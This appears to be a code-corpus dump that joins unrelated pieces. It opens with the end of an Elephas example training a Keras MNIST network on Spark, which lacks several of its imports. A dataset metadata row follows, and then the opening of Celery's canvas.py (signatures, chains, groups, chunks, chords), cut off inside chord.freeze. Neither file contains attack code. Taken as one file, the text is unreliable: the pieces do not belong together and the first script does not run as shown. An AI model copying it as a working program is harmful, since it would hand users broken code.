from tensorflow.keras.utils import to_categorical
from elephas.spark_model import SparkModel
from elephas.utils.rdd_utils import to_simple_rdd
from pyspark import SparkContext, SparkConf
# Define basic parameters
batch_size = 64
nb_classes = 10
epochs = 1
# Create Spark context
conf = SparkConf().setAppName('Mnist_Spark_MLP').setMaster('local[8]')
sc = SparkContext(conf=conf)
# Load data
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(60000, 784)
x_test = x_test.reshape(10000, 784)
x_train = x_train.astype("float32")
x_test = x_test.astype("float32")
x_train /= 255
x_test /= 255
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# Convert class vectors to binary class matrices
y_train = to_categorical(y_train, nb_classes)
y_test = to_categorical(y_test, nb_classes)
model = Sequential()
model.add(Dense(128, input_dim=784))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(10))
model.add(Activation('softmax'))
sgd = SGD(lr=0.1)
model.compile(sgd, 'categorical_crossentropy', ['acc'])
# Build RDD from numpy features and labels
rdd = to_simple_rdd(sc, x_train, y_train)
# Initialize SparkModel from tensorflow.keras model and Spark context
spark_model = SparkModel(model, mode='asynchronous')
# Train Spark model
spark_model.fit(rdd, epochs=epochs, batch_size=batch_size, verbose=2, validation_split=0.1)
# Evaluate Spark model by evaluating the underlying model
score = spark_model.evaluate(x_test, y_test, verbose=2)
print('Test accuracy:', score[1])
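# Note (added sketch, not part of the original example): SparkModel also
# supports other parameter-update strategies; only the mode string changes,
# e.g.:
#
#     spark_model = SparkModel(model, mode='synchronous')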
| mit | 4,591,990,503,040,828,000 | 29.081967 | 91 | 0.751499 | false | 3.073702 | true | false | false |
chugunovyar/factoryForBuild | env/lib/python2.7/site-packages/celery/canvas.py | 2 | 49586 | # -*- coding: utf-8 -*-
"""Composing task work-flows.
.. seealso::
You should import these from :mod:`celery` and not this module.
"""
from __future__ import absolute_import, unicode_literals
import itertools
import operator
import sys
from collections import MutableSequence, deque
from copy import deepcopy
from functools import partial as _partial, reduce
from operator import itemgetter
from kombu.utils.functional import fxrange, reprcall
from kombu.utils.objects import cached_property
from kombu.utils.uuid import uuid
from vine import barrier
from celery._state import current_app
from celery.five import python_2_unicode_compatible
from celery.local import try_import
from celery.result import GroupResult
from celery.utils import abstract
from celery.utils.functional import (
maybe_list, is_list, _regen, regen, chunks as _chunks,
seq_concat_seq, seq_concat_item,
)
from celery.utils.objects import getitem_property
from celery.utils.text import truncate, remove_repeating_from_task
__all__ = [
'Signature', 'chain', 'xmap', 'xstarmap', 'chunks',
'group', 'chord', 'signature', 'maybe_signature',
]
PY3 = sys.version_info[0] == 3
# json in Python 2.7 borks if dict contains byte keys.
JSON_NEEDS_UNICODE_KEYS = PY3 and not try_import('simplejson')
def maybe_unroll_group(g):
"""Unroll group with only one member."""
# Issue #1656
try:
size = len(g.tasks)
except TypeError:
try:
size = g.tasks.__length_hint__()
except (AttributeError, TypeError):
return g
else:
return list(g.tasks)[0] if size == 1 else g
else:
return g.tasks[0] if size == 1 else g
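# Illustrative sketch (added; ``add`` is a placeholder task, not defined in
# this module): a single-member group unrolls to its only task, while a
# larger group is returned unchanged::
#
#     maybe_unroll_group(group(add.s(2, 2)))         # -> add.s(2, 2)
#     maybe_unroll_group(group(add.s(1), add.s(2)))  # -> the group itself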
def task_name_from(task):
return getattr(task, 'name', task)
def _upgrade(fields, sig):
"""Used by custom signatures in .from_dict, to keep common fields."""
sig.update(chord_size=fields.get('chord_size'))
return sig
@abstract.CallableSignature.register
@python_2_unicode_compatible
class Signature(dict):
"""Task Signature.
Class that wraps the arguments and execution options
for a single task invocation.
Used as the parts in a :class:`group` and other constructs,
or to pass tasks around as callbacks while being compatible
with serializers with a strict type subset.
Signatures can also be created from tasks:
- Using the ``.signature()`` method that has the same signature
as ``Task.apply_async``:
.. code-block:: pycon
>>> add.signature(args=(1,), kwargs={'kw': 2}, options={})
- or the ``.s()`` shortcut that works for star arguments:
.. code-block:: pycon
>>> add.s(1, kw=2)
- the ``.s()`` shortcut does not allow you to specify execution options
      but there's a chaining `.set` method that returns the signature:
.. code-block:: pycon
>>> add.s(2, 2).set(countdown=10).set(expires=30).delay()
Note:
You should use :func:`~celery.signature` to create new signatures.
The ``Signature`` class is the type returned by that function and
should be used for ``isinstance`` checks for signatures.
See Also:
:ref:`guide-canvas` for the complete guide.
Arguments:
task (Task, str): Either a task class/instance, or the name of a task.
args (Tuple): Positional arguments to apply.
kwargs (Dict): Keyword arguments to apply.
options (Dict): Additional options to :meth:`Task.apply_async`.
Note:
If the first argument is a :class:`dict`, the other
arguments will be ignored and the values in the dict will be used
instead::
>>> s = signature('tasks.add', args=(2, 2))
>>> signature(s)
{'task': 'tasks.add', args=(2, 2), kwargs={}, options={}}
"""
TYPES = {}
_app = _type = None
@classmethod
def register_type(cls, name=None):
def _inner(subclass):
cls.TYPES[name or subclass.__name__] = subclass
return subclass
return _inner
@classmethod
def from_dict(cls, d, app=None):
typ = d.get('subtask_type')
if typ:
target_cls = cls.TYPES[typ]
if target_cls is not cls:
return target_cls.from_dict(d, app=app)
return Signature(d, app=app)
def __init__(self, task=None, args=None, kwargs=None, options=None,
type=None, subtask_type=None, immutable=False,
app=None, **ex):
self._app = app
if isinstance(task, dict):
super(Signature, self).__init__(task) # works like dict(d)
else:
# Also supports using task class/instance instead of string name.
try:
task_name = task.name
except AttributeError:
task_name = task
else:
self._type = task
super(Signature, self).__init__(
task=task_name, args=tuple(args or ()),
kwargs=kwargs or {},
options=dict(options or {}, **ex),
subtask_type=subtask_type,
immutable=immutable,
chord_size=None,
)
def __call__(self, *partial_args, **partial_kwargs):
"""Call the task directly (in the current process)."""
args, kwargs, _ = self._merge(partial_args, partial_kwargs, None)
return self.type(*args, **kwargs)
def delay(self, *partial_args, **partial_kwargs):
"""Shortcut to :meth:`apply_async` using star arguments."""
return self.apply_async(partial_args, partial_kwargs)
def apply(self, args=(), kwargs={}, **options):
"""Call task locally.
Same as :meth:`apply_async` but executed the task inline instead
of sending a task message.
"""
# For callbacks: extra args are prepended to the stored args.
args, kwargs, options = self._merge(args, kwargs, options)
return self.type.apply(args, kwargs, **options)
def apply_async(self, args=(), kwargs={}, route_name=None, **options):
"""Apply this task asynchronously.
Arguments:
args (Tuple): Partial args to be prepended to the existing args.
kwargs (Dict): Partial kwargs to be merged with existing kwargs.
options (Dict): Partial options to be merged
with existing options.
Returns:
~@AsyncResult: promise of future evaluation.
See also:
:meth:`[email protected]_async` and the :ref:`guide-calling` guide.
"""
try:
_apply = self._apply_async
except IndexError: # pragma: no cover
# no tasks for chain, etc to find type
return
# For callbacks: extra args are prepended to the stored args.
if args or kwargs or options:
args, kwargs, options = self._merge(args, kwargs, options)
else:
args, kwargs, options = self.args, self.kwargs, self.options
# pylint: disable=too-many-function-args
# Borks on this, as it's a property
return _apply(args, kwargs, **options)
def _merge(self, args=(), kwargs={}, options={}, force=False):
if self.immutable and not force:
return (self.args, self.kwargs,
dict(self.options, **options) if options else self.options)
return (tuple(args) + tuple(self.args) if args else self.args,
dict(self.kwargs, **kwargs) if kwargs else self.kwargs,
dict(self.options, **options) if options else self.options)
def clone(self, args=(), kwargs={}, **opts):
"""Create a copy of this signature.
Arguments:
args (Tuple): Partial args to be prepended to the existing args.
kwargs (Dict): Partial kwargs to be merged with existing kwargs.
options (Dict): Partial options to be merged with
existing options.
"""
# need to deepcopy options so origins links etc. is not modified.
if args or kwargs or opts:
args, kwargs, opts = self._merge(args, kwargs, opts)
else:
args, kwargs, opts = self.args, self.kwargs, self.options
s = Signature.from_dict({'task': self.task, 'args': tuple(args),
'kwargs': kwargs, 'options': deepcopy(opts),
'subtask_type': self.subtask_type,
'chord_size': self.chord_size,
'immutable': self.immutable}, app=self._app)
s._type = self._type
return s
partial = clone
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None):
"""Finalize the signature by adding a concrete task id.
The task won't be called and you shouldn't call the signature
twice after freezing it as that'll result in two task messages
using the same task id.
Returns:
~@AsyncResult: promise of future evaluation.
"""
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
opts = self.options
try:
tid = opts['task_id']
except KeyError:
tid = opts['task_id'] = _id or uuid()
if root_id:
opts['root_id'] = root_id
if parent_id:
opts['parent_id'] = parent_id
if 'reply_to' not in opts:
opts['reply_to'] = self.app.oid
if group_id:
opts['group_id'] = group_id
if chord:
opts['chord'] = chord
# pylint: disable=too-many-function-args
# Borks on this, as it's a property.
return self.AsyncResult(tid)
_freeze = freeze
def replace(self, args=None, kwargs=None, options=None):
"""Replace the args, kwargs or options set for this signature.
These are only replaced if the argument for the section is
not :const:`None`.
"""
s = self.clone()
if args is not None:
s.args = args
if kwargs is not None:
s.kwargs = kwargs
if options is not None:
s.options = options
return s
def set(self, immutable=None, **options):
"""Set arbitrary execution options (same as ``.options.update(…)``).
Returns:
Signature: This is a chaining method call
(i.e., it will return ``self``).
"""
if immutable is not None:
self.set_immutable(immutable)
self.options.update(options)
return self
def set_immutable(self, immutable):
self.immutable = immutable
def _with_list_option(self, key):
items = self.options.setdefault(key, [])
if not isinstance(items, MutableSequence):
items = self.options[key] = [items]
return items
def append_to_list_option(self, key, value):
items = self._with_list_option(key)
if value not in items:
items.append(value)
return value
def extend_list_option(self, key, value):
items = self._with_list_option(key)
items.extend(maybe_list(value))
def link(self, callback):
"""Add callback task to be applied if this task succeeds.
Returns:
Signature: the argument passed, for chaining
or use with :func:`~functools.reduce`.
"""
return self.append_to_list_option('link', callback)
def link_error(self, errback):
"""Add callback task to be applied on error in task execution.
Returns:
Signature: the argument passed, for chaining
or use with :func:`~functools.reduce`.
"""
return self.append_to_list_option('link_error', errback)
def on_error(self, errback):
"""Version of :meth:`link_error` that supports chaining.
on_error chains the original signature, not the errback so::
>>> add.s(2, 2).on_error(errback.s()).delay()
calls the ``add`` task, not the ``errback`` task, but the
reverse is true for :meth:`link_error`.
"""
self.link_error(errback)
return self
def flatten_links(self):
"""Return a recursive list of dependencies.
"unchain" if you will, but with links intact.
"""
return list(itertools.chain.from_iterable(itertools.chain(
[[self]],
(link.flatten_links()
for link in maybe_list(self.options.get('link')) or [])
)))
def __or__(self, other):
# These could be implemented in each individual class,
# I'm sure, but for now we have this.
if isinstance(other, chord) and len(other.tasks) == 1:
# chord with one header -> header[0] | body
other = other.tasks[0] | other.body
if isinstance(self, group):
if isinstance(other, group):
# group() | group() -> single group
return group(
itertools.chain(self.tasks, other.tasks), app=self.app)
# group() | task -> chord
if len(self.tasks) == 1:
# group(ONE.s()) | other -> ONE.s() | other
# Issue #3323
return self.tasks[0] | other
return chord(self, body=other, app=self._app)
elif isinstance(other, group):
# unroll group with one member
other = maybe_unroll_group(other)
if isinstance(self, _chain):
# chain | group() -> chain
sig = self.clone()
sig.tasks.append(other)
return sig
# task | group() -> chain
return _chain(self, other, app=self.app)
if not isinstance(self, _chain) and isinstance(other, _chain):
# task | chain -> chain
return _chain(
seq_concat_seq((self,), other.tasks), app=self._app)
elif isinstance(other, _chain):
# chain | chain -> chain
sig = self.clone()
if isinstance(sig.tasks, tuple):
sig.tasks = list(sig.tasks)
sig.tasks.extend(other.tasks)
return sig
elif isinstance(self, chord):
# chord(ONE, body) | other -> ONE | body | other
            # chord with one header task is unnecessary.
if len(self.tasks) == 1:
return self.tasks[0] | self.body | other
# chord | task -> attach to body
sig = self.clone()
sig.body = sig.body | other
return sig
elif isinstance(other, Signature):
if isinstance(self, _chain):
if isinstance(self.tasks[-1], group):
# CHAIN [last item is group] | TASK -> chord
sig = self.clone()
sig.tasks[-1] = chord(
sig.tasks[-1], other, app=self._app)
return sig
elif isinstance(self.tasks[-1], chord):
# CHAIN [last item is chord] -> chain with chord body.
sig = self.clone()
sig.tasks[-1].body = sig.tasks[-1].body | other
return sig
else:
# chain | task -> chain
return _chain(
seq_concat_item(self.tasks, other), app=self._app)
# task | task -> chain
return _chain(self, other, app=self._app)
return NotImplemented
def election(self):
type = self.type
app = type.app
tid = self.options.get('task_id') or uuid()
with app.producer_or_acquire(None) as P:
props = type.backend.on_task_call(P, tid)
app.control.election(tid, 'task', self.clone(task_id=tid, **props),
connection=P.connection)
return type.AsyncResult(tid)
def reprcall(self, *args, **kwargs):
args, kwargs, _ = self._merge(args, kwargs, {}, force=True)
return reprcall(self['task'], args, kwargs)
def __deepcopy__(self, memo):
memo[id(self)] = self
return dict(self)
def __invert__(self):
return self.apply_async().get()
def __reduce__(self):
# for serialization, the task type is lazily loaded,
# and not stored in the dict itself.
return signature, (dict(self),)
def __json__(self):
return dict(self)
def __repr__(self):
return self.reprcall()
if JSON_NEEDS_UNICODE_KEYS: # pragma: no cover
def items(self):
for k, v in dict.items(self):
yield k.decode() if isinstance(k, bytes) else k, v
@property
def name(self):
# for duck typing compatibility with Task.name
return self.task
@cached_property
def type(self):
return self._type or self.app.tasks[self['task']]
@cached_property
def app(self):
return self._app or current_app
@cached_property
def AsyncResult(self):
try:
return self.type.AsyncResult
except KeyError: # task not registered
return self.app.AsyncResult
@cached_property
def _apply_async(self):
try:
return self.type.apply_async
except KeyError:
return _partial(self.app.send_task, self['task'])
id = getitem_property('options.task_id', 'Task UUID')
parent_id = getitem_property('options.parent_id', 'Task parent UUID.')
root_id = getitem_property('options.root_id', 'Task root UUID.')
task = getitem_property('task', 'Name of task.')
args = getitem_property('args', 'Positional arguments to task.')
kwargs = getitem_property('kwargs', 'Keyword arguments to task.')
options = getitem_property('options', 'Task execution options.')
subtask_type = getitem_property('subtask_type', 'Type of signature')
chord_size = getitem_property(
'chord_size', 'Size of chord (if applicable)')
immutable = getitem_property(
'immutable', 'Flag set if no longer accepts new arguments')
@Signature.register_type(name='chain')
@python_2_unicode_compatible
class _chain(Signature):
tasks = getitem_property('kwargs.tasks', 'Tasks in chain.')
@classmethod
def from_dict(cls, d, app=None):
tasks = d['kwargs']['tasks']
if tasks:
if isinstance(tasks, tuple): # aaaargh
tasks = d['kwargs']['tasks'] = list(tasks)
# First task must be signature object to get app
tasks[0] = maybe_signature(tasks[0], app=app)
return _upgrade(d, _chain(tasks, app=app, **d['options']))
def __init__(self, *tasks, **options):
tasks = (regen(tasks[0]) if len(tasks) == 1 and is_list(tasks[0])
else tasks)
Signature.__init__(
self, 'celery.chain', (), {'tasks': tasks}, **options
)
self._use_link = options.pop('use_link', None)
self.subtask_type = 'chain'
self._frozen = None
def __call__(self, *args, **kwargs):
if self.tasks:
return self.apply_async(args, kwargs)
def clone(self, *args, **kwargs):
to_signature = maybe_signature
s = Signature.clone(self, *args, **kwargs)
s.kwargs['tasks'] = [
to_signature(sig, app=self._app, clone=True)
for sig in s.kwargs['tasks']
]
return s
def apply_async(self, args=(), kwargs={}, **options):
# python is best at unpacking kwargs, so .run is here to do that.
app = self.app
if app.conf.task_always_eager:
return self.apply(args, kwargs, **options)
return self.run(args, kwargs, app=app, **(
dict(self.options, **options) if options else self.options))
def run(self, args=(), kwargs={}, group_id=None, chord=None,
task_id=None, link=None, link_error=None, publisher=None,
producer=None, root_id=None, parent_id=None, app=None, **options):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
app = app or self.app
use_link = self._use_link
if use_link is None and app.conf.task_protocol == 1:
use_link = True
args = (tuple(args) + tuple(self.args)
if args and not self.immutable else self.args)
if self._frozen:
tasks, results = self._frozen
else:
tasks, results = self.prepare_steps(
args, self.tasks, root_id, parent_id, link_error, app,
task_id, group_id, chord,
)
if results:
if link:
tasks[0].extend_list_option('link', link)
first_task = tasks.pop()
# chain option may already be set, resulting in
# "multiple values for keyword argument 'chain'" error.
# Issue #3379.
options['chain'] = tasks if not use_link else None
first_task.apply_async(**options)
return results[0]
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
_, results = self._frozen = self.prepare_steps(
self.args, self.tasks, root_id, parent_id, None,
self.app, _id, group_id, chord, clone=False,
)
return results[0]
def prepare_steps(self, args, tasks,
root_id=None, parent_id=None, link_error=None, app=None,
last_task_id=None, group_id=None, chord_body=None,
clone=True, from_dict=Signature.from_dict):
app = app or self.app
# use chain message field for protocol 2 and later.
# this avoids pickle blowing the stack on the recursion
# required by linking task together in a tree structure.
        # (why is pickle using recursion? or, better yet, why can't Python
        # do tail-call optimization, making recursion actually useful?)
use_link = self._use_link
if use_link is None and app.conf.task_protocol == 1:
use_link = True
steps = deque(tasks)
steps_pop = steps.pop
steps_extend = steps.extend
prev_task = None
prev_res = None
tasks, results = [], []
i = 0
# NOTE: We are doing this in reverse order.
# The result is a list of tasks in reverse order, that is
# passed as the ``chain`` message field.
# As it's reversed the worker can just do ``chain.pop()`` to
# get the next task in the chain.
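        # Worked illustration (added; ``a``, ``b``, ``c`` stand for any
        # signatures): for chain(a, b, c) this loop yields tasks == [c, b, a];
        # run() then pops ``a`` to send it first and ships [c, b] in the
        # message's ``chain`` field, so each worker pops its successor.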
while steps:
task = steps_pop()
is_first_task, is_last_task = not steps, not i
if not isinstance(task, abstract.CallableSignature):
task = from_dict(task, app=app)
if isinstance(task, group):
task = maybe_unroll_group(task)
# first task gets partial args from chain
if clone:
task = task.clone(args) if is_first_task else task.clone()
elif is_first_task:
task.args = tuple(args) + tuple(task.args)
if isinstance(task, _chain):
# splice the chain
steps_extend(task.tasks)
continue
if isinstance(task, group) and prev_task:
# automatically upgrade group(...) | s to chord(group, s)
# for chords we freeze by pretending it's a normal
# signature instead of a group.
tasks.pop()
results.pop()
task = chord(
task, body=prev_task,
task_id=prev_res.task_id, root_id=root_id, app=app,
)
if is_last_task:
# chain(task_id=id) means task id is set for the last task
# in the chain. If the chord is part of a chord/group
# then that chord/group must synchronize based on the
# last task in the chain, so we only set the group_id and
# chord callback for the last task.
res = task.freeze(
last_task_id,
root_id=root_id, group_id=group_id, chord=chord_body,
)
else:
res = task.freeze(root_id=root_id)
i += 1
if prev_task:
if use_link:
# link previous task to this task.
task.link(prev_task)
if prev_res and not prev_res.parent:
prev_res.parent = res
if link_error:
for errback in maybe_list(link_error):
task.link_error(errback)
tasks.append(task)
results.append(res)
prev_task, prev_res = task, res
if isinstance(task, chord):
app.backend.ensure_chords_allowed()
# If the task is a chord, and the body is a chain
# the chain has already been prepared, and res is
# set to the last task in the callback chain.
# We need to change that so that it points to the
# group result object.
node = res
while node.parent:
node = node.parent
prev_res = node
return tasks, results
def apply(self, args=(), kwargs={}, **options):
last, fargs = None, args
for task in self.tasks:
res = task.clone(fargs).apply(
last and (last.get(),), **dict(self.options, **options))
res.parent, last, fargs = last, res, None
return last
@property
def app(self):
app = self._app
if app is None:
try:
app = self.tasks[0]._app
except LookupError:
pass
return app or current_app
def __repr__(self):
if not self.tasks:
return '<{0}@{1:#x}: empty>'.format(
type(self).__name__, id(self))
return remove_repeating_from_task(
self.tasks[0]['task'],
' | '.join(repr(t) for t in self.tasks))
class chain(_chain):
"""Chain tasks together.
Each tasks follows one another,
by being applied as a callback of the previous task.
Note:
If called with only one argument, then that argument must
be an iterable of tasks to chain: this allows us
to use generator expressions.
Example:
This is effectively :math:`((2 + 2) + 4)`:
.. code-block:: pycon
>>> res = chain(add.s(2, 2), add.s(4))()
>>> res.get()
8
Calling a chain will return the result of the last task in the chain.
You can get to the other tasks by following the ``result.parent``'s:
.. code-block:: pycon
>>> res.parent.get()
4
Using a generator expression:
.. code-block:: pycon
>>> lazy_chain = chain(add.s(i) for i in range(10))
>>> res = lazy_chain(3)
Arguments:
*tasks (Signature): List of task signatures to chain.
If only one argument is passed and that argument is
an iterable, then that'll be used as the list of signatures
to chain instead. This means that you can use a generator
expression.
Returns:
~celery.chain: A lazy signature that can be called to apply the first
            task in the chain. When that task succeeds, the next task in the
chain is applied, and so on.
"""
# could be function, but must be able to reference as :class:`chain`.
def __new__(cls, *tasks, **kwargs):
# This forces `chain(X, Y, Z)` to work the same way as `X | Y | Z`
if not kwargs and tasks:
if len(tasks) == 1 and is_list(tasks[0]):
# ensure chain(generator_expression) works.
tasks = tasks[0]
return reduce(operator.or_, tasks)
return super(chain, cls).__new__(cls, *tasks, **kwargs)
class _basemap(Signature):
_task_name = None
_unpack_args = itemgetter('task', 'it')
@classmethod
def from_dict(cls, d, app=None):
return _upgrade(
d, cls(*cls._unpack_args(d['kwargs']), app=app, **d['options']),
)
def __init__(self, task, it, **options):
Signature.__init__(
self, self._task_name, (),
{'task': task, 'it': regen(it)}, immutable=True, **options
)
def apply_async(self, args=(), kwargs={}, **opts):
# need to evaluate generators
task, it = self._unpack_args(self.kwargs)
return self.type.apply_async(
(), {'task': task, 'it': list(it)},
route_name=task_name_from(self.kwargs.get('task')), **opts
)
@Signature.register_type()
@python_2_unicode_compatible
class xmap(_basemap):
"""Map operation for tasks.
Note:
Tasks executed sequentially in process, this is not a
parallel operation like :class:`group`.
"""
_task_name = 'celery.map'
def __repr__(self):
task, it = self._unpack_args(self.kwargs)
return '[{0}(x) for x in {1}]'.format(
task.task, truncate(repr(it), 100))
@Signature.register_type()
@python_2_unicode_compatible
class xstarmap(_basemap):
"""Map operation for tasks, using star arguments."""
_task_name = 'celery.starmap'
def __repr__(self):
task, it = self._unpack_args(self.kwargs)
return '[{0}(*x) for x in {1}]'.format(
task.task, truncate(repr(it), 100))
@Signature.register_type()
class chunks(Signature):
"""Partition of tasks in n chunks."""
_unpack_args = itemgetter('task', 'it', 'n')
@classmethod
def from_dict(cls, d, app=None):
return _upgrade(
d, chunks(*cls._unpack_args(
d['kwargs']), app=app, **d['options']),
)
def __init__(self, task, it, n, **options):
Signature.__init__(
self, 'celery.chunks', (),
{'task': task, 'it': regen(it), 'n': n},
immutable=True, **options
)
def __call__(self, **options):
return self.apply_async(**options)
def apply_async(self, args=(), kwargs={}, **opts):
return self.group().apply_async(
args, kwargs,
route_name=task_name_from(self.kwargs.get('task')), **opts
)
def group(self):
# need to evaluate generators
task, it, n = self._unpack_args(self.kwargs)
return group((xstarmap(task, part, app=self._app)
for part in _chunks(iter(it), n)),
app=self._app)
@classmethod
def apply_chunks(cls, task, it, n, app=None):
return cls(task, it, n, app=app)()
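# Usage sketch (added; ``add`` is a placeholder task): split 100 argument
# pairs into 10 xstarmap tasks of 10 pairs each::
#
#     sig = chunks(add.s(), zip(range(100), range(100)), 10)
#     sig.group()    # -> group of 10 xstarmap signatures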
def _maybe_group(tasks, app):
if isinstance(tasks, dict):
tasks = signature(tasks, app=app)
if isinstance(tasks, (group, _chain)):
tasks = tasks.tasks
elif isinstance(tasks, abstract.CallableSignature):
tasks = [tasks]
else:
tasks = [signature(t, app=app) for t in tasks]
return tasks
@Signature.register_type()
@python_2_unicode_compatible
class group(Signature):
"""Creates a group of tasks to be executed in parallel.
A group is lazy so you must call it to take action and evaluate
the group.
Note:
If only one argument is passed, and that argument is an iterable
then that'll be used as the list of tasks instead: this
allows us to use ``group`` with generator expressions.
Example:
>>> lazy_group = group([add.s(2, 2), add.s(4, 4)])
>>> promise = lazy_group() # <-- evaluate: returns lazy result.
>>> promise.get() # <-- will wait for the task to return
[4, 8]
Arguments:
*tasks (Signature): A list of signatures that this group will call.
If there's only one argument, and that argument is an iterable,
then that'll define the list of signatures instead.
**options (Any): Execution options applied to all tasks
in the group.
Returns:
~celery.group: signature that when called will then call all of the
tasks in the group (and return a :class:`GroupResult` instance
that can be used to inspect the state of the group).
"""
tasks = getitem_property('kwargs.tasks', 'Tasks in group.')
@classmethod
def from_dict(cls, d, app=None):
return _upgrade(
d, group(d['kwargs']['tasks'], app=app, **d['options']),
)
def __init__(self, *tasks, **options):
if len(tasks) == 1:
tasks = tasks[0]
if isinstance(tasks, group):
tasks = tasks.tasks
if not isinstance(tasks, _regen):
tasks = regen(tasks)
Signature.__init__(
self, 'celery.group', (), {'tasks': tasks}, **options
)
self.subtask_type = 'group'
def __call__(self, *partial_args, **options):
return self.apply_async(partial_args, **options)
def skew(self, start=1.0, stop=None, step=1.0):
it = fxrange(start, stop, step, repeatlast=True)
for task in self.tasks:
task.set(countdown=next(it))
return self
def apply_async(self, args=(), kwargs=None, add_to_parent=True,
producer=None, link=None, link_error=None, **options):
if link is not None:
raise TypeError('Cannot add link to group: use a chord')
if link_error is not None:
raise TypeError(
'Cannot add link to group: do that on individual tasks')
app = self.app
if app.conf.task_always_eager:
return self.apply(args, kwargs, **options)
if not self.tasks:
return self.freeze()
options, group_id, root_id = self._freeze_gid(options)
tasks = self._prepared(self.tasks, [], group_id, root_id, app)
p = barrier()
results = list(self._apply_tasks(tasks, producer, app, p,
args=args, kwargs=kwargs, **options))
result = self.app.GroupResult(group_id, results, ready_barrier=p)
p.finalize()
# - Special case of group(A.s() | group(B.s(), C.s()))
# That is, group with single item that's a chain but the
# last task in that chain is a group.
#
# We cannot actually support arbitrary GroupResults in chains,
# but this special case we can.
if len(result) == 1 and isinstance(result[0], GroupResult):
result = result[0]
parent_task = app.current_worker_task
if add_to_parent and parent_task:
parent_task.add_trail(result)
return result
def apply(self, args=(), kwargs={}, **options):
app = self.app
if not self.tasks:
return self.freeze() # empty group returns GroupResult
options, group_id, root_id = self._freeze_gid(options)
tasks = self._prepared(self.tasks, [], group_id, root_id, app)
return app.GroupResult(group_id, [
sig.apply(args=args, kwargs=kwargs, **options) for sig, _ in tasks
])
def set_immutable(self, immutable):
for task in self.tasks:
task.set_immutable(immutable)
def link(self, sig):
# Simply link to first task
sig = sig.clone().set(immutable=True)
return self.tasks[0].link(sig)
def link_error(self, sig):
sig = sig.clone().set(immutable=True)
return self.tasks[0].link_error(sig)
def _prepared(self, tasks, partial_args, group_id, root_id, app,
CallableSignature=abstract.CallableSignature,
from_dict=Signature.from_dict,
isinstance=isinstance, tuple=tuple):
for task in tasks:
if isinstance(task, CallableSignature):
# local sigs are always of type Signature, and we
# clone them to make sure we don't modify the originals.
task = task.clone()
else:
# serialized sigs must be converted to Signature.
task = from_dict(task, app=app)
if isinstance(task, group):
# needs yield_from :(
unroll = task._prepared(
task.tasks, partial_args, group_id, root_id, app,
)
for taskN, resN in unroll:
yield taskN, resN
else:
if partial_args and not task.immutable:
task.args = tuple(partial_args) + tuple(task.args)
yield task, task.freeze(group_id=group_id, root_id=root_id)
def _apply_tasks(self, tasks, producer=None, app=None, p=None,
add_to_parent=None, chord=None,
args=None, kwargs=None, **options):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
app = app or self.app
with app.producer_or_acquire(producer) as producer:
for sig, res in tasks:
sig.apply_async(producer=producer, add_to_parent=False,
chord=sig.options.get('chord') or chord,
args=args, kwargs=kwargs,
**options)
# adding callback to result, such that it will gradually
# fulfill the barrier.
#
# Using barrier.add would use result.then, but we need
# to add the weak argument here to only create a weak
# reference to the object.
if p and not p.cancelled and not p.ready:
p.size += 1
res.then(p, weak=True)
yield res # <-- r.parent, etc set in the frozen result.
def _freeze_gid(self, options):
# remove task_id and use that as the group_id,
# if we don't remove it then every task will have the same id...
options = dict(self.options, **options)
options['group_id'] = group_id = (
options.pop('task_id', uuid()))
return options, group_id, options.get('root_id')
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
opts = self.options
try:
gid = opts['task_id']
except KeyError:
gid = opts['task_id'] = uuid()
if group_id:
opts['group_id'] = group_id
if chord:
opts['chord'] = chord
root_id = opts.setdefault('root_id', root_id)
parent_id = opts.setdefault('parent_id', parent_id)
new_tasks = []
# Need to unroll subgroups early so that chord gets the
# right result instance for chord_unlock etc.
results = list(self._freeze_unroll(
new_tasks, group_id, chord, root_id, parent_id,
))
if isinstance(self.tasks, MutableSequence):
self.tasks[:] = new_tasks
else:
self.tasks = new_tasks
return self.app.GroupResult(gid, results)
_freeze = freeze
def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
stack = deque(self.tasks)
while stack:
task = maybe_signature(stack.popleft(), app=self._app).clone()
if isinstance(task, group):
stack.extendleft(task.tasks)
else:
new_tasks.append(task)
yield task.freeze(group_id=group_id,
chord=chord, root_id=root_id,
parent_id=parent_id)
def __repr__(self):
if self.tasks:
return remove_repeating_from_task(
self.tasks[0]['task'],
'group({0.tasks!r})'.format(self))
return 'group(<empty>)'
def __len__(self):
return len(self.tasks)
@property
def app(self):
app = self._app
if app is None:
try:
app = self.tasks[0].app
except LookupError:
pass
return app if app is not None else current_app
@Signature.register_type()
@python_2_unicode_compatible
class chord(Signature):
r"""Barrier synchronization primitive.
A chord consists of a header and a body.
The header is a group of tasks that must complete before the callback is
called. A chord is essentially a callback for a group of tasks.
The body is applied with the return values of all the header
tasks as a list.
Example:
The chord:
.. code-block:: pycon
>>> res = chord([add.s(2, 2), add.s(4, 4)])(sum_task.s())
is effectively :math:`\Sigma ((2 + 2) + (4 + 4))`:
.. code-block:: pycon
>>> res.get()
12
"""
@classmethod
def from_dict(cls, d, app=None):
args, d['kwargs'] = cls._unpack_args(**d['kwargs'])
return _upgrade(d, cls(*args, app=app, **d))
@staticmethod
def _unpack_args(header=None, body=None, **kwargs):
# Python signatures are better at extracting keys from dicts
# than manually popping things off.
return (header, body), kwargs
def __init__(self, header, body=None, task='celery.chord',
args=(), kwargs={}, app=None, **options):
Signature.__init__(
self, task, args,
dict(kwargs=kwargs, header=_maybe_group(header, app),
body=maybe_signature(body, app=app)), app=app, **options
)
self.subtask_type = 'chord'
def __call__(self, body=None, **options):
return self.apply_async((), {'body': body} if body else {}, **options)
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
